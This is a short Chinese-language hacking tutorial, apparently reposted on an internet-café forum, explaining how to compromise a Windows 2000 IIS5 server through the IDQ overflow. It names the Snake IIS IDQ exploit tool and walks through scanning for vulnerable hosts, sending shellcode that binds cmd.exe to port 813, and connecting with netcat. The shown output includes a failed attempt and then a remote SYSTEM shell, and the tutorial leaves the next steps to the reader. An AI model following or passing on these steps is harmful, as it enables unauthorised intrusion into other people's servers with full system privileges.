要用到3个程序，一个Snake IIS IDQ 溢出程序GUI版本，一个扫描器，还有NC。

　　首先扫描一台有IDQ漏洞的机器，然后设置Snake IIS IDQ 溢出程序，在被攻击IP地址后面写上对方的IP。端口号一般不需要改动，软件的默认绑定CMD.EXE的端口是813，不改了。用默认的，左面选择操作系统类型，随便选一个，我们选IIS5 English Win2k Sp0吧，点击IDQ溢出，出现发送Shellcode成功的提示了，然后我们用NC来连接。

　　进入MS-DOS。进入“nc”的目录。然后：nc --v IP 813

c:\>nc -vv IP 813 IP: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [IP] 813 (?): connection refused sent 0, rcvd 0: NOTSOCK c:\>

　　看来没成功，别灰心，再来一次，换用IIS5 English Win2k Sp1试试。

c:\>nc -vv IP 813 IP: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [IP] 813 (?) open Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>

　　哈哈，终于上来啦，你现在可是system权限，下面该怎么做就看你的啦。

欢迎访问最专业的网吧论坛,无盘论坛,网吧经营,网咖管理,网吧专业论坛https://bbs.txwb.com

关注天下网吧微信,了解网吧网咖经营管理，安装维护: